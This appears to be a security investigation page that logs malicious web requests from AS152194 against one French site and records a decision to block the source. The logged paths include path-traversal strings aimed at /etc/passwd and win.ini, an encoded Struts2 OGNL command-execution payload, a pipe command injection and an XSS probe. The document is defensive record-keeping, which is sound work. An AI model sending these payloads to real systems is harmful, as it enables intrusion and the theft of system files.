Investigation Workspace

Entity: AS152194 (Asn)

Entity Details
Type
Asn
ASN
AS152194 - CTG Server Limited
Threat Intelligence
Associated with IP 134.122.136.96, which triggered multiple critical WAF deny rules including LFI, command injection, XSS, and bot impersonation. All accessed paths from this ASN were flagged as malicious.
Linked Entities
TLS Fingerprints (1)
Hostnames Targeted
Hostname Request Count
www.darcherif.fr 179
Paths Targeted (with Hostname Counts)
Path Distinct Hostnames
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 1
template/aui/text-inline.vm 1
content/crx/de/setPreferences.jsp;%0A.html 1
icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 1
public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd 1
GallerySite/filesrc/fotoilan/388/middle/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd 1
api/Image/withpath/C:%5CWindows%5Cwin.ini 1
Content/Plugins/uploader/FileChoose.html 1
file/../../../../../../../../../../../../../../../../../../windows/win.ini 1
%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action 1
jeecg-boot/jmreport/queryFieldBySql 1
content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json 1
file-manager/backend/makefile 1
.well-known/pki-validation/ 1
etc/designs/xh1x.childrenlist.json/%3Csvg%20onload=alert%28document.domain%29%3E.html 1
cgit/cgit.cgi/git/objects/ 1
chat/imController/showOrDownByurl.do 1
api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd 1
go/add-on/business-continuity/api/plugin 1
CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 1
file/../../../../../../../../../../../../../../../../../../etc/passwd 1
7/0/33/1d/www.citysearch.com/search 1
wp-content/plugins/import-xml-feed/readme.txt 1
download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 1
public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini 1
./WEB-INF/classes/META-INF/microprofile-config.properties 1
server/node_upgrade_srv.js 1
modules/Rubrics/rubrics_visualise_saveAjax.php 1
.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash 1
..;/content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json 1
content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css 1
cgi-bin/GetFileContent.cgi 1
crx/de/setPreferences.jsp;%0A.html 1
install 1
simpleeditor/common/commonReleaseNotes.do 1
cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd 1
assets/built%252F..%252F..%252F%25E0%25A4%25A/package.json 1
img/../../../../../../etc/passwd 1
api/2.0/mlflow/model-versions/create 1
chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd 1
nifi-api/access/config 1
cgi-bin/slogin/login.py 1
cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh 1
api/geojson 1
installer 1
setting.php 1
backup/auto.php 1
saml/login 1
../../etc/passwd 1
api/get-users 1
🚫

Block

Associated with IP 134.122.136.96, which triggered multiple critical WAF deny rules including LFI, command injection, XSS, and bot impersonation. All accessed paths from this ASN were flagged as malicious.

2025-11-30 14:03:57